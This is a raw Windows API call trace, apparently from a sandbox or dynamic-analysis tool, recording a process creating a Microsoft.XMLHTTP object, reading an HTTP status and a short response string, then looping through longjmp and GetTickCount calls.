	[0140.689] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d8d0 | out: ppvObject=0x26d8d0*=0x0) returned 0x80004002
	[0140.689] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=10, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x26d8a8*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be60, pExcepInfo=0x26d8f0, puArgErr=0x26d8c0 | out: pDispParams=0x26d8a8*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be60*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="'Thank You: 3226803", varVal2=0x0), pExcepInfo=0x26d8f0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d8c0*=0x26dd90) returned 0x0
	[0140.690] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x1
	[0140.690] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d4a8 | out: ppvObject=0x26d4a8*=0x0) returned 0x80004002
	[0140.691] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26d5c0*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26d3fc | out: rgDispId=0x26d3fc*=7) returned 0x0
	[0140.691] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x3
	[0140.691] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d180 | out: ppvObject=0x26d180*=0x0) returned 0x80004002
	[0140.691] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=7, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x26d158*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be18, pExcepInfo=0x26d1a0, puArgErr=0x26d170 | out: pDispParams=0x26d158*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be18*(varType=0x3, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xc8, varVal2=0x0), pExcepInfo=0x26d1a0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d170*=0x0) returned 0x0
	[0140.691] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x2
	[0140.692] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0140.692] malloc (_Size=0xb0) returned 0x42e060
	[0140.694] GetTickCount () returned 0x115a120
	[0140.694] GetTickCount () returned 0x115a120
	[0140.694] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d4a8 | out: ppvObject=0x26d4a8*=0x0) returned 0x80004002
	[0140.695] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26d5c0*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26d3fc | out: rgDispId=0x26d3fc*=7) returned 0x0
	[0140.695] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x3
	[0140.695] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d180 | out: ppvObject=0x26d180*=0x0) returned 0x80004002
	[0140.695] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=7, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x26d158*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be18, pExcepInfo=0x26d1a0, puArgErr=0x26d170 | out: pDispParams=0x26d158*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be18*(varType=0x3, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xc8, varVal2=0x0), pExcepInfo=0x26d1a0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d170*=0xffffffff) returned 0x0
	[0140.695] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x2
	[0140.696] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x1
	[0140.696] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x0
	[0140.696] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0140.700] longjmp () 
	[0140.700] longjmp () 
	[0140.700] longjmp () 
	[0140.700] GetCurrentThreadId () returned 0x9a8
	[0140.701] GetCurrentThreadId () returned 0x9a8
	[0140.701] ??2@YAPEAX_K@Z () returned 0x3e4000
	[0140.701] malloc (_Size=0x80) returned 0x3c88b0
	[0140.701] longjmp () 
	[0140.701] longjmp () 
	[0140.701] longjmp () 
	[0140.701] longjmp () 
	[0140.702] longjmp () 
	[0140.702] longjmp () 
	[0140.702] longjmp () 
	[0140.702] longjmp () 
	[0140.702] longjmp () 
	[0140.703] longjmp () 
	[0140.703] longjmp () 
	[0140.703] longjmp () 
	[0140.703] longjmp () 
	[0140.704] GetTickCount () returned 0x115a130
	[0140.704] longjmp () 
	[0140.704] longjmp () 
	[0140.704] longjmp () 
	[0140.704] longjmp () 
	[0140.704] longjmp () 
	[0140.705] longjmp () 
	[0140.705] longjmp () 
	[0140.705] longjmp () 
	[0140.705] longjmp () 
	[0140.705] longjmp () 
	[0140.706] longjmp () 
	[0140.706] longjmp () 
	[0140.706] longjmp () 
	[0140.706] longjmp () 
	[0140.706] longjmp () 
	[0140.706] longjmp () 
	[0140.707] longjmp () 
	[0140.707] longjmp () 
	[0140.707] longjmp () 
	[0140.707] longjmp () 
	[0140.707] longjmp () 
	[0140.708] longjmp () 
	[0140.708] longjmp () 
	[0140.708] longjmp () 
	[0140.708] longjmp () 
	[0140.708] longjmp () 
	[0140.709] longjmp () 
	[0140.709] longjmp () 
	[0140.709] longjmp () 
	[0140.709] longjmp () 
	[0140.709] longjmp () 
	[0140.710] longjmp () 
	[0140.710] GetTickCount () returned 0x115a130
	[0140.710] longjmp () 
	[0140.710] longjmp () 
	[0140.710] longjmp () 
	[0140.710] longjmp () 
	[0140.710] longjmp () 
	[0140.711] longjmp () 
	[0140.711] longjmp () 
	[0140.711] longjmp () 
	[0140.711] longjmp () 
	[0140.711] longjmp () 
	[0140.711] longjmp () 
	[0140.711] longjmp () 
	[0140.712] longjmp () 
	[0140.712] longjmp () 
	[0140.712] longjmp () 
	[0140.712] longjmp () 
	[0140.712] longjmp () 
	[0140.713] longjmp () 
	[0140.713] longjmp () 
	[0140.713] longjmp () 
	[0140.713] longjmp () 
	[0140.714] longjmp () 
	[0140.714] longjmp () 
	[0140.714] longjmp () 
	[0140.714] longjmp () 
	[0140.714] longjmp () 
	[0140.714] longjmp () 
	[0140.714] longjmp () 
	[0140.715] longjmp () 
	[0140.715] longjmp () 
	[0140.715] longjmp () 
	[0140.715] longjmp () 
	[0140.715] GetTickCount () returned 0x115a13f
	[0140.715] longjmp () 
	[0140.715] longjmp () 
	[0140.716] longjmp () 
	[0140.716] longjmp () 
	[0140.716] longjmp () 
	[0140.716] longjmp () 
	[0140.716] longjmp () 
	[0140.717] longjmp () 
	[0140.717] longjmp () 
	[0140.717] longjmp () 
	[0140.717] longjmp () 
	[0140.717] longjmp () 
	[0140.717] longjmp () 
	[0140.718] longjmp () 
	[0140.718] longjmp () 
	[0140.718] longjmp () 
	[0140.718] longjmp () 
	[0140.718] longjmp () 
	[0140.718] longjmp () 
	[0140.718] longjmp () 
	[0140.719] longjmp () 
	[0140.719] longjmp () 
	[0140.719] longjmp () 
	[0140.719] longjmp () 
	[0140.719] longjmp () 
	[0140.720] longjmp () 
	[0140.720] longjmp () 
	[0140.720] longjmp () 
	[0140.720] longjmp () 
	[0140.720] longjmp () 
	[0140.720] longjmp () 
	[0140.721] longjmp () 
	[0140.721] GetTickCount () returned 0x115a13f
	[0140.721] longjmp () 
	[0140.721] longjmp () 
	[0140.721] longjmp () 
	[0140.721] longjmp () 
	[0140.721] longjmp () 
	[0140.722] longjmp () 
	[0140.722] longjmp () 
	[0140.722] longjmp () 
	[0140.722] longjmp () 
	[0140.722] longjmp () 
	[0140.723] longjmp () 
	[0140.723] longjmp () 
	[0140.723] longjmp () 
	[0140.723] longjmp () 
	[0140.723] longjmp () 
	[0140.723] longjmp () 
	[0140.724] longjmp () 
	[0140.724] longjmp () 
	[0140.724] longjmp () 
	[0140.724] longjmp () 
	[0140.724] longjmp () 
	[0140.724] longjmp () 
	[0140.725] longjmp () 
	[0140.725] longjmp () 
	[0140.725] longjmp () 
	[0140.725] longjmp () 
	[0140.725] longjmp () 
	[0140.725] longjmp () 
	[0140.726] longjmp () 
	[0140.726] longjmp () 
	[0140.726] longjmp () 
	[0140.726] longjmp () 
	[0140.726] GetTickCount () returned 0x115a13f
	[0140.726] longjmp () 
	[0140.726] longjmp () 
	[0140.727] longjmp () 
	[0140.727] longjmp () 
	[0140.727] longjmp () 
	[0140.727] longjmp () 
	[0140.727] longjmp () 
	[0140.727] longjmp () 
	[0140.727] longjmp () 
	[0140.728] longjmp () 
	[0140.728] longjmp () 
	[0140.728] longjmp () 
	[0140.728] longjmp () 
	[0140.728] longjmp () 
	[0140.728] longjmp () 
	[0140.729] longjmp () 
	[0140.729] longjmp () 
	[0140.729] longjmp () 
	[0140.729] longjmp () 
	[0140.729] longjmp () 
	[0140.730] longjmp () 
	[0140.730] longjmp () 
	[0140.730] longjmp () 
	[0140.730] longjmp () 
	[0140.730] longjmp () 
	[0140.730] longjmp () 
	[0140.730] longjmp () 
	[0140.731] longjmp () 
	[0140.731] longjmp () 
	[0140.731] longjmp () 
	[0140.731] longjmp () 
	[0140.731] longjmp () 
	[0140.731] GetTickCount () returned 0x115a14f
	[0140.731] longjmp () 
	[0140.732] longjmp () 
	[0140.732] longjmp () 
	[0140.732] longjmp () 
	[0140.732] longjmp () 
	[0140.732] longjmp () 
	[0140.733] longjmp () 
	[0140.733] longjmp () 
	[0140.733] longjmp () 
	[0140.733] longjmp () 
	[0140.733] longjmp () 
	[0140.733] longjmp () 
	[0140.734] longjmp () 
	[0140.734] longjmp () 
	[0140.734] longjmp () 
	[0140.734] longjmp () 
	[0140.734] longjmp () 
	[0140.734] longjmp () 
	[0140.734] longjmp () 
	[0140.734] longjmp () 
	[0140.735] longjmp () 
	[0140.735] longjmp () 
	[0140.735] longjmp () 
	[0140.735] longjmp () 
	[0140.735] longjmp () 
	[0140.736] longjmp () 
	[0140.736] longjmp () 
	[0140.736] longjmp () 
	[0140.736] longjmp () 
	[0140.736] longjmp () 
	[0140.736] longjmp () 
	[0140.737] longjmp () 
	[0140.737] GetTickCount () returned 0x115a14f
	[0140.737] longjmp () 
	[0140.737] longjmp () 
	[0140.737] longjmp () 
	[0140.737] longjmp () 
	[0140.738] longjmp () 
	[0140.738] longjmp () 
	[0140.738] longjmp () 
	[0140.738] longjmp () 
	[0140.738] longjmp () 
	[0140.738] longjmp () 
	[0140.739] longjmp () 
	[0140.739] longjmp () 
	[0140.739] longjmp () 
	[0140.739] longjmp () 
	[0140.739] longjmp () 
	[0140.739] longjmp () 
	[0140.740] longjmp () 
	[0140.740] longjmp () 
	[0140.740] longjmp () 
	[0140.740] longjmp () 
	[0140.740] longjmp () 
	[0140.741] longjmp () 
	[0140.741] longjmp () 
	[0140.741] longjmp () 
	[0140.741] longjmp () 
	[0140.741] longjmp () 
	[0140.742] longjmp () 
	[0140.742] longjmp () 
	[0140.742] longjmp () 
	[0140.742] longjmp () 
	[0140.742] longjmp () 
	[0140.743] longjmp () 
	[0140.743] GetTickCount () returned 0x115a14f
	[0140.743] longjmp () 
	[0140.743] longjmp () 
	[0140.743] longjmp () 
	[0140.744] longjmp () 
	[0140.745] longjmp () 
	[0140.745] longjmp () 
	[0140.745] longjmp () 
	[0140.745] longjmp () 
	[0140.745] longjmp () 
	[0140.746] longjmp () 
	[0140.746] longjmp () 
	[0140.746] longjmp () 
	[0140.746] longjmp () 
	[0140.746] longjmp () 
	[0140.747] longjmp () 
	[0140.747] longjmp () 
	[0140.747] longjmp () 
	[0140.748] longjmp () 
	[0140.748] longjmp () 
	[0140.748] longjmp () 
	[0140.749] longjmp () 
	[0140.749] longjmp () 
	[0140.749] longjmp () 
	[0140.749] longjmp () 
	[0140.750] longjmp () 
	[0140.750] longjmp () 
	[0140.750] longjmp () 
	[0140.750] longjmp () 
	[0140.750] longjmp () 
	[0140.750] longjmp () 
	[0140.750] longjmp () 
	[0140.751] longjmp () 
	[0140.751] GetTickCount () returned 0x115a15e
	[0140.751] longjmp () 
	[0140.751] longjmp () 
	[0140.751] longjmp () 
	[0140.751] longjmp () 
	[0140.751] longjmp () 
	[0140.752] longjmp () 
	[0140.752] longjmp () 
	[0140.752] longjmp () 
	[0140.752] longjmp () 
	[0140.752] longjmp () 
	[0140.752] longjmp () 
	[0140.753] longjmp () 
	[0140.753] longjmp () 
	[0140.753] longjmp () 
	[0140.753] longjmp () 
	[0140.753] longjmp () 
	[0140.754] longjmp () 
	[0140.754] longjmp () 
	[0140.754] longjmp () 
	[0140.754] longjmp () 
	[0140.754] longjmp () 
	[0140.754] longjmp () 
	[0140.754] longjmp () 
	[0140.755] longjmp () 
	[0140.755] longjmp () 
	[0140.755] longjmp () 
	[0140.755] longjmp () 
	[0140.755] longjmp () 
	[0140.756] longjmp () 
	[0140.756] longjmp () 
	[0140.756] longjmp () 
	[0140.756] longjmp () 
	[0140.756] GetTickCount () returned 0x115a15e
	[0140.756] longjmp () 
	[0140.757] longjmp () 
	[0140.757] longjmp () 
	[0140.757] longjmp () 
	[0140.757] longjmp () 
	[0140.757] longjmp () 
	[0140.757] longjmp () 
	[0140.757] longjmp () 
	[0140.758] longjmp () 
	[0140.758] longjmp () 
	[0140.758] longjmp () 
	[0140.758] longjmp () 
	[0140.758] longjmp () 
	[0140.758] longjmp () 
	[0140.759] longjmp () 
	[0140.759] longjmp () 
	[0140.759] longjmp () 
	[0140.759] longjmp () 
	[0140.759] longjmp () 
	[0140.760] longjmp () 
	[0140.760] longjmp () 
	[0140.760] longjmp () 
	[0140.760] longjmp () 
	[0140.760] longjmp () 
	[0140.760] longjmp () 
	[0140.761] longjmp () 
	[0140.761] longjmp () 
	[0140.761] longjmp () 
	[0140.761] longjmp () 
	[0140.761] longjmp () 
	[0140.761] longjmp () 
	[0140.761] longjmp () 
	[0140.762] GetTickCount () returned 0x115a16e
	[0140.762] longjmp () 
	[0140.762] longjmp () 
	[0140.762] longjmp () 
	[0140.762] longjmp () 
	[0140.762] longjmp () 
	[0140.762] longjmp () 
	[0140.762] longjmp () 
	[0140.763] longjmp () 
	[0140.763] longjmp () 
	[0140.763] longjmp () 
	[0140.763] longjmp () 
	[0140.763] longjmp () 
	[0140.764] longjmp () 
	[0140.764] longjmp () 
	[0140.764] longjmp () 
	[0140.764] longjmp () 
	[0140.764] longjmp () 
	[0140.764] longjmp () 
	[0140.765] longjmp () 
	[0140.765] longjmp () 
	[0140.765] longjmp () 
	[0140.765] longjmp () 
	[0140.765] longjmp () 
	[0140.765] longjmp () 
	[0140.765] longjmp () 
	[0140.766] longjmp () 
	[0140.766] longjmp () 
	[0140.766] longjmp () 
	[0140.766] longjmp () 
	[0140.766] longjmp () 
	[0140.766] longjmp () 
	[0140.766] longjmp () 
	[0140.767] GetTickCount () returned 0x115a16e
	[0140.767] longjmp () 
	[0140.767] longjmp () 
	[0140.767] longjmp () 
	[0140.767] longjmp () 
	[0140.767] longjmp () 
	[0140.767] longjmp () 
	[0140.767] longjmp () 
	[0140.768] longjmp () 
	[0140.768] longjmp () 
	[0140.768] longjmp () 
	[0140.768] longjmp () 
	[0140.768] longjmp () 
	[0140.768] longjmp () 
	[0140.769] longjmp () 
	[0140.769] longjmp () 
	[0140.769] longjmp () 
	[0140.769] longjmp () 
	[0140.769] longjmp () 
	[0140.769] longjmp () 
	[0140.770] longjmp () 
	[0140.770] longjmp () 
	[0140.770] longjmp () 
	[0140.770] longjmp () 
	[0140.770] longjmp () 
	[0140.770] longjmp () 
	[0140.771] longjmp () 
	[0140.771] longjmp () 
	[0140.771] longjmp () 
	[0140.771] longjmp () 
	[0140.771] longjmp () 
	[0140.771] longjmp () 
	[0140.772] longjmp () 
	[0140.772] GetTickCount () returned 0x115a16e
	[0140.772] longjmp () 
	[0140.772] longjmp () 
	[0140.772] longjmp () 
	[0140.772] longjmp () 
	[0140.772] longjmp () 
	[0140.773] longjmp () 
	[0140.773] longjmp () 
	[0140.773] longjmp () 
	[0140.773] longjmp () 
	[0140.773] longjmp () 
	[0140.773] longjmp () 
	[0140.773] longjmp () 
	[0140.774] longjmp () 
	[0140.774] longjmp () 
	[0140.774] longjmp () 
	[0140.774] longjmp () 
	[0140.774] longjmp () 
	[0140.774] longjmp () 
	[0140.775] longjmp () 
	[0140.775] longjmp () 
	[0140.775] longjmp () 
	[0140.776] longjmp () 
	[0140.776] longjmp () 
	[0140.776] longjmp () 
	[0140.776] longjmp () 
	[0140.776] longjmp () 
	[0140.776] longjmp () 
	[0140.776] longjmp () 
	[0140.777] longjmp () 
	[0140.777] longjmp () 
	[0140.777] longjmp () 
	[0140.777] longjmp () 
	[0140.777] GetTickCount () returned 0x115a17e
	[0140.779] longjmp () 
	[0140.779] longjmp () 
	[0140.779] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x26d970 | out: lpclsid=0x26d970*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0140.779] SysStringLen (param_1=0x0) returned 0x0
	[0140.779] CoGetClassObject (in: rclsid=0x26d970*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef914e1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x26d940 | out: ppv=0x26d940*=0x7fef40bac20) returned 0x0
	[0140.779] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef40bac20, riid=0x7fef9156380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x26d948 | out: ppvObject=0x26d948*=0x0) returned 0x80004002
	[0140.780] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef40bac20, pUnkOuter=0x0, riid=0x7fef914ccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d930 | out: ppvObject=0x26d930*=0x47a5aa0) returned 0x0
	[0140.780] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef40bac20) returned 0x1
	[0140.780] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef91563b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x26d908 | out: ppvObject=0x26d908*=0x47a5b88) returned 0x0
	[0140.780] ??2@YAPEAX_K@Z () returned 0x3cacc0
	[0140.780] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x47a5b88, pUnkSite=0x3cacc0) returned 0x0
	[0140.780] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7feff44d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d678 | out: ppvObject=0x26d678*=0x0) returned 0x80004002
	[0140.780] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7feff426f70*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d680 | out: ppvObject=0x26d680*=0x0) returned 0x80004002
	[0140.780] XMLHTTPRequest:IUnknown:AddRef (This=0x3cacc0) returned 0x2
	[0140.780] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40c8070*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d860 | out: ppvObject=0x26d860*=0x3cacc0) returned 0x0
	[0140.780] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26c680 | out: ppvObject=0x26c680*=0x3cacc0) returned 0x0
	[0140.780] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef40b9ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c6b8 | out: ppvObject=0x26c6b8*=0x0) returned 0x80004002
	[0140.780] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), riid=0x7fef40d0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x26c6a8 | out: ppvObject=0x26c6a8*=0x0) returned 0x80004002
	[0140.780] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26c678 | out: ppvObject=0x26c678*=0x0) returned 0x80004002
	[0140.781] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26c678 | out: ppvObject=0x26c678*=0x0) returned 0x80004002
	[0140.781] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x3
	[0140.781] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40cbbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x26c758 | out: ppvObject=0x26c758*=0x0) returned 0x80004002
	[0140.781] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08c0*(Data1=0x118, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c768 | out: ppvObject=0x26c768*=0x0) returned 0x80004002
	[0140.781] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26c750 | out: ppvObject=0x26c750*=0x3cacc0) returned 0x0
	[0140.781] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef40b9ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c780 | out: ppvObject=0x26c780*=0x0) returned 0x80004002
	[0140.781] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40cbbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x26c758 | out: ppvObject=0x26c758*=0x0) returned 0x80004002
